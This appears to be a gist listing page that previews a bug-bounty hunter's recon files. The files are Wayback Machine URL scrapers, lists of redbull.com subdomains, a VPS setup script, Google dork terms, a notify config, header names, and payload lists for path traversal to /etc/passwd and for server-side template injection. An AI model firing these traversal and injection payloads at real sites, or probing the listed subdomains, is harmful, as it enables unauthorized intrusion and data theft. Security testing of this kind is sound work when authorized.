This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://360content-akamai.redbull.com | |
| https://addons-3styleruconsumeractivationpage.redbull.com | |
| https://ablink.news.redbull.com | |
| https://actions-service-staging.redbull.com | |
| https://ablink.updates.redbull.com | |
| https://actions-service.redbull.com | |
| https://account.redbull.com | |
| https://addons-fantasyfactions.redbull.com | |
| https://9to5.redbull.com | |
| https://400.redbull.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rbponboarding-admin.redbull.com | |
| linktracking-d.redbull.com | |
| stage-redportqsrmq.redbull.com | |
| jamf-download.redbull.com | |
| festivalguidelines-sso.redbull.com | |
| metra-trialandawareness.redbull.com | |
| off-premise-handwriting.redbull.com | |
| edge2.redbull.com | |
| mob-ras-gateway-vienna-split.redbull.com | |
| mediaworld.redbull.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /etc/passwd | |
| ../../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../../../etc/passwd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Copying configurations to VPS | |
| # ./copyconfig.sh X.X.X.X | |
| rsync -vr ~/Tools/authorized_keys root@$1:/root/.ssh/authorized_keys | |
| ssh root@$1 'mkdir -p /root/.config/amass/ /root/Tools/ /root/.config/subfinder/ /root/.config/notify/' | |
| rsync -vr ~/.config/amass/config.ini root@$1:/root/.config/amass/config.ini | |
| rsync -vr ~/Tools/h8mail_config.ini root@$1:/root/Tools/h8mail_config.ini | |
| rsync -vr ~/.config/subfinder/config.yaml root@$1:/root/.config/subfinder/config.yaml |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "PHP Error" | |
| "PHP Parse error" | |
| "PHP Warning" | |
| boot.ini | |
| ext:action | |
| ext:backup | |
| ext:bak | |
| ext:bkf | |
| ext:bkp | |
| ext:cfg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| slack: | |
| - id: "slack" | |
| slack_channel: "recon" | |
| slack_username: "test" | |
| slack_format: "{{data}}" | |
| slack_webhook_url: "https://hooks.slack.com/services/XXXXXX" | |
| discord: | |
| - id: "crawl" | |
| discord_channel: "crawl" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Base-Url | |
| CF-Connecting_IP | |
| Client-IP | |
| Contact | |
| Forwarded | |
| From | |
| Http-Url | |
| Proxy-Host | |
| Proxy-Url | |
| Real-Ip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssti{{7*7}} | |
| ssti[[7*7]] | |
| ssti{{4+'9'}} | |
| ssti<%= 7 * 7 %> | |
| ssti${7*7} | |
| ssti${{7*7}} | |
| ssti@(40+9) | |
| ssti#{7*7} | |
| ssti#{ 7 * 7 } | |
| ssti<%=%207%20*%207%20%> |
OlderNewer